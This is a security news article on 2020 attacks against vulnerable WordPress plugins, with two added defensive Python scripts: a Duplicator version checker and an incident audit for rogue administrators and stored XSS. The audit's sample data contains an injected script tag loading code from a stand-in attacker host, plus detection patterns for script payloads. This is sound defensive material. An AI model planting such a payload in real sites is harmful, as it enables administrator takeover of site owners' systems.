While 2019 was a busy year for WordPress site administrators, the start of 2020 was quiet. The likely reason for the lull was the winter holidays, since attackers take breaks too. In recent weeks, however, attacks on WordPress have resumed, and according to researchers at Wordfence, WebARX and NinTechNet the pause is over. As before, the attacks target vulnerabilities in plugins rather than in the CMS itself. The plugins currently under active attack are listed below.

According to a Wordfence report, since mid-February attackers have been exploiting a vulnerability in the Duplicator plugin, which lets site administrators export the contents of a site and makes it much easier to move it from one server to another. The bug, fixed in version 1.3.28, let attackers download files from the site without authentication, among them wp-config.php, which holds the database credentials; with those, an attacker can connect to the site's MySQL database directly wherever it is reachable. The problem is aggravated by the fact that, when the attacks began, the free plugin had more than a million installations and Duplicator Pro, the commercial version, was installed on a further 170,000 sites.
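The first thing an administrator wants to know after reading the paragraph above is whether the installed copy of Duplicator is older than 1.3.28. The script below is an example added here, not code from Wordfence or the Duplicator project: it reads the standard WordPress plugin header (the comment block at the top of the plugin's main PHP file, which carries a `Version:` line) and compares that version numerically against the fixed release. The header text it parses is constructed for the example; the 1.3.28 cutoff is the one named in the report.

```python
"""Check whether an installed copy of Duplicator predates the 1.3.28 fix.

Added example. It parses the WordPress plugin header comment and compares the
Version field against the first fixed release, component by component, so that
1.3.3 is (correctly) treated as older than 1.3.28 rather than newer as a plain
string comparison would claim.
"""
import re
from typing import Dict, Tuple

DUPLICATOR_FIXED = "1.3.28"  # first release carrying the fix, per the Wordfence report


def parse_plugin_header(php_source: str) -> Dict[str, str]:
    """Extract the 'Key: Value' fields from a WordPress plugin header comment."""
    match = re.search(r"/\*(.*?)\*/", php_source, re.S)
    if not match:
        raise ValueError("no plugin header comment found")
    fields: Dict[str, str] = {}
    for line in match.group(1).splitlines():
        line = line.strip().lstrip("*").strip()  # headers often use ' * Key: Value'
        if ":" in line:
            key, _, value = line.partition(":")
            fields[key.strip()] = value.strip()
    return fields


def version_key(version: str) -> Tuple[int, ...]:
    """Turn '1.3.26' into (1, 3, 26) so versions compare numerically.
    A non-numeric suffix such as '28-beta' is cut off at the first non-digit."""
    parts = []
    for component in version.split("."):
        digits = re.match(r"\d+", component)
        parts.append(int(digits.group()) if digits else 0)
    return tuple(parts)


def is_vulnerable(installed: str, fixed: str = DUPLICATOR_FIXED) -> bool:
    """True when the installed version is older than the first fixed release."""
    return version_key(installed) < version_key(fixed)


def check_duplicator(php_source: str) -> Tuple[str, bool]:
    """Return (installed version, vulnerable?) for a Duplicator main-file source."""
    header = parse_plugin_header(php_source)
    if header.get("Plugin Name") != "Duplicator":
        raise ValueError("not the Duplicator plugin header")
    version = header["Version"]
    return version, is_vulnerable(version)


# Constructed sample: the opening of duplicator.php on an unpatched site.
SAMPLE_HEADER = """<?php
/*
Plugin Name: Duplicator
Description: Migrate and backup a copy of your WordPress files and database.
Version: 1.3.26
Author: Snap Creek
*/
"""

if __name__ == "__main__":
    version, vulnerable = check_duplicator(SAMPLE_HEADER)
    print(f"Duplicator {version}: {'UPDATE NOW' if vulnerable else 'patched'}")
```

On a real server the source passed in is the contents of `wp-content/plugins/duplicator/duplicator.php`; the same header parser works for any plugin, so the version comparison can be reused for the other plugins in this report once their fixed versions are known.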
Also according to Wordfence data, at least two groups are exploiting a flaw in both the free and the professional version of the Profile Builder plugin. The bug lets attackers create new administrator accounts on vulnerable sites. Although it was fixed on February 10, 2020, the attacks began on February 24, the same day a proof-of-concept exploit was published online. About 65,000 sites with the plugin installed are still running a vulnerable version.

Attacks on the ThemeGrill Demo Importer and ThemeREX Addons plugins continue. The first is installed on more than 200,000 sites; its vulnerability lets an attacker wipe a site's database, and if the database contains a user named admin, the attacker is logged in as that user with all of its privileges. The bug in the second plugin likewise lets attackers create new administrator accounts on vulnerable sites, and despite the ongoing attacks there is still no patch for it.
Sites running the Flexible Checkout Fields plugin for WooCommerce, installed on more than 20,000 sites, were also targeted. Here the attackers exploited a stored XSS zero-day, since patched, that allowed the creation of administrator accounts: the injected script runs in the browser of an administrator who opens the affected page and uses that session to add the new account. Despite the release of the patch, the attacks continued at the end of February (1, 2).
Another active campaign exploits three similar zero-day vulnerabilities in the Async JavaScript, 10Web Map Builder for Google Maps and Modern Events Calendar Lite plugins, installed on about 100,000, 20,000 and 40,000 sites respectively. All three bugs were stored XSS and all three have since been fixed, but the attacks began before the patches were released, so some sites were most likely compromised before they could update.
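Nearly every campaign above, from Profile Builder and ThemeREX Addons to the stored-XSS bugs in Flexible Checkout Fields and the three plugins just listed, ends the same way: an administrator account the site owner never created, and in the XSS cases a script payload sitting in plugin settings. The audit below is an example added here, not code from any of the reports or plugins named. Its two queries are plain SQL against the standard WordPress tables (`wp_users`, `wp_usermeta`, `wp_options`); the script runs them against a constructed in-memory SQLite copy of those tables so it works offline, and on a live site the same SQL is run in MySQL, for instance through `wp db query`. The cutoff date, the allow-list of known administrators and the option names are assumptions to replace with your own.

```python
"""Post-incident audit for the two footprints the campaigns above share:
administrator accounts the owner never created, and script payloads stored in
plugin settings (the stored-XSS route that in turn creates such accounts).

Added example. The sample tables are constructed; the SQL targets the standard
WordPress schema and is what you would run against the real database.
"""
import sqlite3
from typing import List, Sequence, Tuple

# Roles are stored PHP-serialized, e.g. a:1:{s:13:"administrator";b:1;}, so a
# LIKE on the quoted role name suffices. With a table prefix other than wp_,
# both the table names and the 'wp_capabilities' meta key change accordingly.
ROGUE_ADMIN_SQL = """
SELECT u.ID, u.user_login, u.user_email, u.user_registered
FROM wp_users u
JOIN wp_usermeta m ON m.user_id = u.ID
WHERE m.meta_key = 'wp_capabilities'
  AND m.meta_value LIKE '%"administrator"%'
  AND u.user_registered >= ?
ORDER BY u.user_registered
"""

# Plugin settings live in wp_options; a script tag, javascript: URL or inline
# event handler in an option value is the footprint of a stored-XSS payload.
SCRIPT_IN_OPTIONS_SQL = """
SELECT option_name, option_value
FROM wp_options
WHERE option_value LIKE '%<script%'
   OR option_value LIKE '%javascript:%'
   OR option_value LIKE '%onerror=%'
"""


def find_rogue_admins(conn: sqlite3.Connection, since: str,
                      known_admins: Sequence[str]) -> List[Tuple]:
    """Administrators registered on or after `since` that are not on the allow-list."""
    rows = conn.execute(ROGUE_ADMIN_SQL, (since,)).fetchall()
    return [row for row in rows if row[1] not in known_admins]


def find_scripts_in_options(conn: sqlite3.Connection) -> List[Tuple]:
    """Options whose value contains an obvious script payload."""
    return conn.execute(SCRIPT_IN_OPTIONS_SQL).fetchall()


def build_sample_db() -> sqlite3.Connection:
    """Constructed tables standing in for a compromised site's database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT,
                               user_email TEXT, user_registered TEXT);
        CREATE TABLE wp_usermeta (umeta_id INTEGER PRIMARY KEY, user_id INTEGER,
                                  meta_key TEXT, meta_value TEXT);
        CREATE TABLE wp_options (option_id INTEGER PRIMARY KEY, option_name TEXT,
                                 option_value TEXT, autoload TEXT);
    """)
    conn.executemany("INSERT INTO wp_users VALUES (?, ?, ?, ?)", [
        (1, "admin", "owner@example.com", "2018-03-01 09:00:00"),
        (2, "jane", "jane@example.com", "2019-11-12 14:20:00"),
        (3, "newadmin", "it@example.com", "2020-02-20 10:00:00"),     # legitimate, allow-listed
        (4, "wpadm1n", "x@attacker.example", "2020-02-25 03:14:07"),  # planted by the attacker
    ])
    conn.executemany(
        "INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)", [
            (1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
            (2, "wp_capabilities", 'a:1:{s:6:"editor";b:1;}'),
            (3, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
            (4, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
        ])
    conn.executemany(
        "INSERT INTO wp_options (option_name, option_value, autoload) VALUES (?, ?, ?)", [
            ("blogname", "Example Shop", "yes"),
            ("siteurl", "https://shop.example", "yes"),
            # Constructed option name; the serialized-settings-with-payload shape is the point.
            ("checkout_fields_settings",
             'a:1:{s:5:"label";s:58:"Phone<script src="https://attacker.example/a.js"></script>";}',
             "yes"),
        ])
    return conn


def audit(since: str = "2020-02-01",
          known_admins: Sequence[str] = ("admin", "newadmin")) -> Tuple[List[Tuple], List[Tuple]]:
    """Run both checks against the constructed database and return the findings."""
    conn = build_sample_db()
    return find_rogue_admins(conn, since, known_admins), find_scripts_in_options(conn)


if __name__ == "__main__":
    rogue, tainted = audit()
    for row in rogue:
        print("unexpected administrator:", row)
    for name, _ in tainted:
        print("script payload in option:", name)
```

The date filter is only a first cut: an attacker who lands on the site through one of these bugs can also promote an existing account, so the capabilities query is worth running once more without the date condition and comparing the full administrator list against what the owner expects. Payloads are not confined to `wp_options` either; `wp_posts` and `wp_postmeta` deserve the same LIKE sweep on sites where the XSS sink was a post or product field.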